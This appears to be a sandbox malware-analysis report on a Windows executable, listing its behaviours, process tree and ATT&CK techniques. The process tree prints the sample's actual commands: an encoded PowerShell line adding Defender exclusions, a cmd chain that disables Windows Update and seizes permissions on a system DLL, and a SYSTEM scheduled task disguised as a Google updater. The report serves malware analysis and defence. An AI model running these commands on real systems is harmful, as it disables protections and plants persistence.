Analysis

  • max time kernel
    120s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    31-10-2022 13:52

General

  • Target

    tmp.exe

  • Size

    1.8MB

  • MD5

    6691c3106d5319f108114a48f5177396

  • SHA1

    1ce92f03b5e7bd1c1d591141693f6e0261f3afee

  • SHA256

    375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97

  • SHA512

    19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7

  • SSDEEP

    49152:+1rLSuOMv2pORqIwpn3AcRs3gzAiYSWTqP7:K3O02WyDQDDTqP

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcgBkACMAPgA="
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2036
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:1788
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:1612
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:824
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:1552
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:1516
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:1524
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:932
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:1744
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:1684
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:1752
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1312
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:976
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:2028
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1592
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1548
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1100
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:1628
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:1692
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:1396
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:1772
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:1524
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:1000
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:1684
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:960
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                      3⤵
                      • Creates scheduled task(s)
                      PID:1404
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1144
                    • C:\Windows\system32\schtasks.exe
                      schtasks /run /tn "GoogleUpdateTaskMachineQC"
                      3⤵
                        PID:1872
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {1018BD6A-7E61-4E53-B20F-437050FE9901} S-1-5-18:NT AUTHORITY\System:Service:
                    1⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:556
                    • C:\Program Files\Google\Chrome\updater.exe
                      "C:\Program Files\Google\Chrome\updater.exe"
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:276
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcgBkACMAPgA="
                        3⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:860
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        3⤵
                          PID:1312
                          • C:\Windows\system32\sc.exe
                            sc stop UsoSvc
                            4⤵
                            • Launches sc.exe
                            PID:1568
                          • C:\Windows\system32\sc.exe
                            sc stop WaaSMedicSvc
                            4⤵
                            • Launches sc.exe
                            PID:996
                          • C:\Windows\system32\sc.exe
                            sc stop wuauserv
                            4⤵
                            • Launches sc.exe
                            PID:1956
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                            4⤵
                            • Modifies registry key
                            PID:1132
                          • C:\Windows\system32\sc.exe
                            sc stop dosvc
                            4⤵
                            • Launches sc.exe
                            PID:1144
                          • C:\Windows\system32\sc.exe
                            sc stop bits
                            4⤵
                            • Launches sc.exe
                            PID:1324
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                            4⤵
                            • Modifies registry key
                            PID:1240
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                            4⤵
                            • Modifies registry key
                            PID:1316
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                            4⤵
                            • Modifies registry key
                            PID:2032
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                            4⤵
                            • Modifies registry key
                            PID:1204
                          • C:\Windows\system32\takeown.exe
                            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                            4⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            • Suspicious use of AdjustPrivilegeToken
                            PID:976
                          • C:\Windows\system32\icacls.exe
                            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                            4⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:1564
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:1528
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:432
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:1164
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:1816
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                            4⤵
                              PID:892
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                              4⤵
                                PID:1628
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                4⤵
                                  PID:1692
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                  4⤵
                                    PID:1396
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                    4⤵
                                      PID:1772
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                      4⤵
                                        PID:1524
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                        4⤵
                                          PID:1860
                                      • C:\Windows\System32\conhost.exe
                                        C:\Windows\System32\conhost.exe "bdapyxxyq"
                                        3⤵
                                          PID:1728

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v6

                                    Execution

                                    Scheduled Task

                                    1
                                    T1053

                                    Persistence

                                    Modify Existing Service

                                    2
                                    T1031

                                    Scheduled Task

                                    1
                                    T1053

                                    Privilege Escalation

                                    Scheduled Task

                                    1
                                    T1053

                                    Defense Evasion

                                    Modify Registry

                                    2
                                    T1112

                                    Impair Defenses

                                    1
                                    T1562

                                    File Permissions Modification

                                    1
                                    T1222

                                    Discovery

                                    System Information Discovery

                                    1
                                    T1082

                                    Impact

                                    Service Stop

                                    1
                                    T1489

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Program Files\Google\Chrome\updater.exe
                                      Filesize

                                      1.8MB

                                      MD5

                                      6691c3106d5319f108114a48f5177396

                                      SHA1

                                      1ce92f03b5e7bd1c1d591141693f6e0261f3afee

                                      SHA256

                                      375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97

                                      SHA512

                                      19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7

                                    • C:\Program Files\Google\Chrome\updater.exe
                                      Filesize

                                      1.8MB

                                      MD5

                                      6691c3106d5319f108114a48f5177396

                                      SHA1

                                      1ce92f03b5e7bd1c1d591141693f6e0261f3afee

                                      SHA256

                                      375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97

                                      SHA512

                                      19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7

                                    • \Program Files\Google\Chrome\updater.exe
                                      Filesize

                                      1.8MB

                                      MD5

                                      6691c3106d5319f108114a48f5177396

                                      SHA1

                                      1ce92f03b5e7bd1c1d591141693f6e0261f3afee

                                      SHA256

                                      375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97

                                      SHA512

                                      19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7

                                    • memory/276-113-0x0000000000A60000-0x0000000000A66000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/276-83-0x0000000000000000-mapping.dmp
                                    • memory/276-87-0x000000013FA50000-0x000000013FC2E000-memory.dmp
                                      Filesize

                                      1.9MB

                                    • memory/432-117-0x0000000000000000-mapping.dmp
                                    • memory/824-67-0x0000000000000000-mapping.dmp
                                    • memory/860-96-0x000007FEEC450000-0x000007FEECFAD000-memory.dmp
                                      Filesize

                                      11.4MB

                                    • memory/860-91-0x0000000000000000-mapping.dmp
                                    • memory/860-95-0x000007FEECFB0000-0x000007FEED9D3000-memory.dmp
                                      Filesize

                                      10.1MB

                                    • memory/892-120-0x0000000000000000-mapping.dmp
                                    • memory/932-71-0x0000000000000000-mapping.dmp
                                    • memory/960-77-0x0000000000000000-mapping.dmp
                                    • memory/976-114-0x0000000000000000-mapping.dmp
                                    • memory/976-76-0x0000000000000000-mapping.dmp
                                    • memory/996-104-0x0000000000000000-mapping.dmp
                                    • memory/1000-100-0x0000000000000000-mapping.dmp
                                    • memory/1100-90-0x0000000000000000-mapping.dmp
                                    • memory/1132-108-0x0000000000000000-mapping.dmp
                                    • memory/1144-107-0x0000000000000000-mapping.dmp
                                    • memory/1144-79-0x0000000000000000-mapping.dmp
                                    • memory/1164-118-0x0000000000000000-mapping.dmp
                                    • memory/1204-112-0x0000000000000000-mapping.dmp
                                    • memory/1240-109-0x0000000000000000-mapping.dmp
                                    • memory/1312-75-0x0000000000000000-mapping.dmp
                                    • memory/1312-102-0x0000000000000000-mapping.dmp
                                    • memory/1316-110-0x0000000000000000-mapping.dmp
                                    • memory/1324-106-0x0000000000000000-mapping.dmp
                                    • memory/1396-97-0x0000000000000000-mapping.dmp
                                    • memory/1396-123-0x0000000000000000-mapping.dmp
                                    • memory/1404-78-0x0000000000000000-mapping.dmp
                                    • memory/1516-69-0x0000000000000000-mapping.dmp
                                    • memory/1524-99-0x0000000000000000-mapping.dmp
                                    • memory/1524-70-0x0000000000000000-mapping.dmp
                                    • memory/1524-125-0x0000000000000000-mapping.dmp
                                    • memory/1528-116-0x0000000000000000-mapping.dmp
                                    • memory/1548-88-0x0000000000000000-mapping.dmp
                                    • memory/1552-68-0x0000000000000000-mapping.dmp
                                    • memory/1564-115-0x0000000000000000-mapping.dmp
                                    • memory/1568-103-0x0000000000000000-mapping.dmp
                                    • memory/1592-85-0x0000000000000000-mapping.dmp
                                    • memory/1612-66-0x0000000000000000-mapping.dmp
                                    • memory/1628-93-0x0000000000000000-mapping.dmp
                                    • memory/1628-121-0x0000000000000000-mapping.dmp
                                    • memory/1636-64-0x0000000000000000-mapping.dmp
                                    • memory/1684-73-0x0000000000000000-mapping.dmp
                                    • memory/1684-101-0x0000000000000000-mapping.dmp
                                    • memory/1692-94-0x0000000000000000-mapping.dmp
                                    • memory/1692-122-0x0000000000000000-mapping.dmp
                                    • memory/1700-54-0x000000013FDF0000-0x000000013FFCE000-memory.dmp
                                      Filesize

                                      1.9MB

                                    • memory/1700-55-0x000007FEFC611000-0x000007FEFC613000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1728-127-0x0000000000060000-0x0000000000067000-memory.dmp
                                      Filesize

                                      28KB

                                    • memory/1728-129-0x0000000000000000-mapping.dmp
                                    • memory/1728-130-0x0000000000060000-0x0000000000067000-memory.dmp
                                      Filesize

                                      28KB

                                    • memory/1728-131-0x00000000007E0000-0x00000000007E6000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/1744-72-0x0000000000000000-mapping.dmp
                                    • memory/1752-74-0x0000000000000000-mapping.dmp
                                    • memory/1772-98-0x0000000000000000-mapping.dmp
                                    • memory/1772-124-0x0000000000000000-mapping.dmp
                                    • memory/1788-65-0x0000000000000000-mapping.dmp
                                    • memory/1816-119-0x0000000000000000-mapping.dmp
                                    • memory/1860-126-0x0000000000000000-mapping.dmp
                                    • memory/1872-80-0x0000000000000000-mapping.dmp
                                    • memory/1956-105-0x0000000000000000-mapping.dmp
                                    • memory/2028-81-0x0000000000000000-mapping.dmp
                                    • memory/2032-111-0x0000000000000000-mapping.dmp
                                    • memory/2036-63-0x00000000024AB000-0x00000000024CA000-memory.dmp
                                      Filesize

                                      124KB

                                    • memory/2036-58-0x000007FEEE3A0000-0x000007FEEEDC3000-memory.dmp
                                      Filesize

                                      10.1MB

                                    • memory/2036-56-0x0000000000000000-mapping.dmp
                                    • memory/2036-59-0x000007FEED840000-0x000007FEEE39D000-memory.dmp
                                      Filesize

                                      11.4MB

                                    • memory/2036-60-0x00000000024A4000-0x00000000024A7000-memory.dmp
                                      Filesize

                                      12KB

                                    • memory/2036-62-0x00000000024A4000-0x00000000024A7000-memory.dmp
                                      Filesize

                                      12KB

                                    • memory/2036-61-0x000000001B750000-0x000000001BA4F000-memory.dmp
                                      Filesize

                                      3.0MB